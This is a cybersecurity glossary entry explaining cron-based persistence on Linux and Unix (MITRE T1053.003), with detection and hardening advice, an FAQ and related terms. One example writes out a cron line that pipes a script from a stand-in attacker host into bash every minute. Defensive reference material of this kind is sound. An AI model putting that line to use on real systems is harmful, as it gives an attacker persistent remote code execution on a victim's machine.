Cron Persistence
What is Cron Persistence?
Cron PersistenceLinux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event.
Cron persistence (MITRE ATT&CK T1053.003) targets the Unix cron daemon and its variants (anacron, fcron, systemd-timer counterparts). Attackers add entries to /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/, or per-user crontabs (crontab -e). Common payloads are reverse-shell one-liners, downloader curl pipes, or scripts in /tmp. Because cron runs as root or the user it belongs to, the technique is reliable and trivial to deploy after initial access. Detection: file-integrity monitoring on cron directories, auditd watches on cron files, baseline of expected jobs, and EDR alerts on shells spawned by cron. Hardening: restrict crontab membership, mount /tmp noexec, and enable systemd-cron auditing where available.
● Examples
- 01
Adding * * * * * curl -s http://attacker/sh | bash to /etc/cron.d/update.
- 02
Dropping a script into /etc/cron.hourly/ to reconnect a reverse shell every hour.
● Frequently asked questions
What is Cron Persistence?
Linux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event. It belongs to the Attacks & Threats category of cybersecurity.
What does Cron Persistence mean?
Linux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event.
How does Cron Persistence work?
Cron persistence (MITRE ATT&CK T1053.003) targets the Unix cron daemon and its variants (anacron, fcron, systemd-timer counterparts). Attackers add entries to /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/, or per-user crontabs (crontab -e). Common payloads are reverse-shell one-liners, downloader curl pipes, or scripts in /tmp. Because cron runs as root or the user it belongs to, the technique is reliable and trivial to deploy after initial access. Detection: file-integrity monitoring on cron directories, auditd watches on cron files, baseline of expected jobs, and EDR alerts on shells spawned by cron. Hardening: restrict crontab membership, mount /tmp noexec, and enable systemd-cron auditing where available.
How do you defend against Cron Persistence?
Defences for Cron Persistence typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Cron Persistence?
Common alternative names include: Crontab persistence, Anacron persistence.
● Related terms
- attacks№ 610
LD_PRELOAD Hijacking
Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes.
- attacks№ 608
launchd Persistence
macOS persistence technique that installs a LaunchDaemon or LaunchAgent property list so launchd executes attacker code at boot, login, or on a trigger.
- attacks№ 975
Scheduled Task Persistence
Persistence and execution technique in which an attacker creates or modifies a Windows scheduled task to run their payload on a trigger such as logon, boot, or a timer.
- attacks№ 1246
WMI Event Subscription Persistence
Persistence technique that registers a permanent WMI event filter and consumer so attacker code runs whenever a chosen system event occurs.
- attacks№ 914
Registry Run Key Persistence
Classic Windows persistence technique that adds an entry under a Run or RunOnce registry key so a binary or script executes every time a user logs on.